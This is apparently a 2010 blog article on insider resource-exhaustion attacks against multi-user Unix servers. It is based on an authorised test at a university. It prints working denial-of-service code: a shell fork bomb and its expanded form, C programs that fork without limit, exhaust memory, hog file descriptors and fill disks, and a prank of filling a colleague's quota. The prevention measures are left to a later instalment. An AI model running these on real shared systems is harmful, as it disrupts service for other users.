Multi-user Linux security - insider resource attacks

Published: Thursday, 27 May 2010 16:25

It is commonly assumed that the largest threats to computer systems come from "the outside" and can be prevented with decent anti-virus software and firewalls.  Attacks from the inside (usually by legitimate users, or via compromised accounts) are often overlooked, yet they can be devastating in large multi-user environments.  The resource issues outlined in this article may be exploited either deliberately or through buggy software, but prevention can be simple.

When asked why someone prefers a non-Windows operating system over Microsoft Windows, the standard response from "home users" will always include "security".  While this may be true, it is far from the end of the story.  To highlight this, I was recently one of many people invited to help test a room full of SunRay machines at Aberystwyth University.  The idea of the exercise was to flush out any issues with the setup so they could be fixed, rather than leaving the network to chance.  We managed to bring the entire room to a halt on several occasions, which was a nice achievement, but surely the beast that is Solaris 10 should have kept a bunch of students out for more than a few minutes?  The problem stems from the fact that every logged-in user is running programs on the same physical machine.  All of the problems we found were extremely simple to exploit, and they shared the common theme of resource wastage.  Multi-user operating systems must therefore be configured to strike a balance between giving users the freedom to do what they need to do, and stopping that freedom from restricting the resources available to other users.

Listed below are some of the problems we found, all of which are very common issues, along with how I have dealt with them on my own CentOS and FreeBSD multi-user servers using "ulimit".

Fork Bomb

I was a bit disappointed that this one worked as well as it did.  In a university environment I'd expect anyone experimenting with forks in a C program, for example, to cause infinite forks at least once per term!  I was even more disappointed that the person who did it heard me talking about how to do it in the first place, but that's a rant for another day.  A fork bomb is essentially a program that "forks" itself repeatedly: it clones itself, and the clone runs as another process.  The program in question was a single line of shell code:

  :(){ : | : & }; :

Although this looks like a bunch of smilies, it is one of the easiest and quickest ways to crash a Unix or Linux based machine.  The following code segment is exactly the same as above, but written in a more traditional way.  If you are familiar with shell scripts, the effects should be fairly easy to work out.

  func() {
      func | func &
  }
  func

This defines the function func(), which calls itself and pipes the output to another call of func(), forked as a new process so that it runs independently of the parent.  These new forked processes then fork more processes, and so on.  Fork bombs can bring even a relatively powerful server to a standstill in seconds rather than minutes, and do so by filling the operating system's process table as well as using a lot of processing time while processes are forked.  This makes curing the problem once it has started extremely difficult.  One suggestion is to run a second fork bomb that you have control over, taking back process slots one by one until the original fork bomb has been eradicated, and then send the command to kill the second wave of fork bombs.  Unfortunately, by the time an attack has been spotted and identified, it is unlikely that there will be enough process space left to start the counter-attack.  The best thing to do is prevent it occurring in the first place by setting process limits.
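The same attack needs only a few lines of C.  The sketch below is my own illustration rather than anything written during the exercise, and assumes a POSIX system with fork() available; it should only ever be run inside a disposable virtual machine.

  /* Illustration only: repeatedly fork until the process table is full.
     Assumes a POSIX system. Run it only in a disposable virtual machine. */
  #include <unistd.h>

  int main()
  {
      while(1)
      {
          fork();    /* every process that exists keeps creating more */
      }
      return 0;
  }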

Memory Wastage

It was not confirmed whether this was actually the cause of a system-wide halt for all users on the university's Sun machines, however I was able to reliably replicate the issue three out of three times, and the "top" output before it crashed certainly suggested it was something to do with me, so I'm counting it as a second win.  I was quite pleased I got this one to work, although not surprised after the effects of the fork bomb: if process counts were not limited, then memory usage was unlikely to be either.  The difference is that accidental memory leaks are more common than fork bombs, but usually only waste a few MB.  If one process hogs all of the system's RAM, other processes that request chunks of memory will not be allocated any.  How the problem ends then depends on how each piece of running software is designed to deal with a failed allocation (e.g. malloc returning NULL).  Many programmers ignore the NULL return, causing programs to "crash" (e.g. dump core).  Others may exit gracefully, write to error logs, halt until memory becomes available, or attempt to continue normal operation.  Additionally, data integrity and system security may be compromised.  I wrote some simple C code to test this, an example of which is listed below.

  #include <stdio.h>
  #include <stdlib.h>
  #include <string.h>

  int main()
  {
      int i = 0;
      while(1)
      {
          char *t = malloc(1024*1024);     /* request 1 MB at a time */
          if(t == NULL)
          {
              printf("end\n");             /* allocation failed: memory exhausted */
              break;
          }
          memset(t, 1, 1024*1024);         /* touch the block so the pages are really allocated */
          printf("%d MB\n", i);
          i++;
      }
      return 0;
  }

Hogging File Descriptors

As with the processes discussed earlier, there are only so many files that can be opened at once, and again the maximum is defined by the kernel.  Modifying the code above to open files rather than allocate memory will let you test this; the principle is exactly the same as with processes.  If you grab all of the descriptors at the same time, nobody else will be able to open a file until more become available.  Unlike the process issue, however, the applications that need file handles are usually already running, which leads to the same situation as not getting a valid memory address when memory is scarce: it all depends on the error handling of each individual application.
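For completeness, here is a rough sketch of that modification.  It is an assumption on my part rather than the exact code used in the exercise; the path /tmp/fd_test is just a placeholder, and on most systems the per-process limit will be hit before the kernel-wide one.

  /* Illustration only: open the same file repeatedly until open() fails,
     then hold the descriptors. /tmp/fd_test is just a placeholder path. */
  #include <stdio.h>
  #include <fcntl.h>
  #include <unistd.h>

  int main()
  {
      int count = 0;
      while(1)
      {
          int fd = open("/tmp/fd_test", O_RDONLY | O_CREAT, 0600);
          if(fd == -1)
          {
              printf("open failed after %d descriptors\n", count);
              pause();    /* keep the descriptors open until the process is killed */
              return 1;
          }
          count++;
      }
      return 0;
  }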

Filling the Disks

Running out of disk space can be a pain for a normal home user, but a single well-placed large file on a multi-user server can bring things to a standstill.  Commands such as "dd" make generating huge files trivial, however it is often the sneaky ones that go unnoticed.  Typing something like:

  yes > ~/large_file &

into a colleague's terminal will give you plenty of time to escape before they realise the disk quota has been reached.
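The same effect is just as easy to produce from a program as from the command line.  The sketch below is an illustration of mine, not one of the test programs from the exercise: it appends zero-filled blocks to a placeholder file until write() fails, typically because the disk, or the user's quota, is full.

  /* Illustration only: append 1 MB blocks to a file until the write fails
     (disk full or quota reached). "large_file" is just a placeholder name. */
  #include <stdio.h>
  #include <string.h>
  #include <fcntl.h>
  #include <unistd.h>

  int main()
  {
      static char block[1024*1024];
      memset(block, 0, sizeof(block));

      int fd = open("large_file", O_WRONLY | O_CREAT | O_APPEND, 0600);
      if(fd == -1)
      {
          perror("open");
          return 1;
      }

      long mb = 0;
      while(write(fd, block, sizeof(block)) == (ssize_t)sizeof(block))
      {
          mb++;    /* keep writing until the disk or quota runs out */
      }
      printf("stopped after %ld MB\n", mb);
      close(fd);
      return 0;
  }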

Next Time...

In the next instalment of this article I will discuss how to prevent the attacks described above.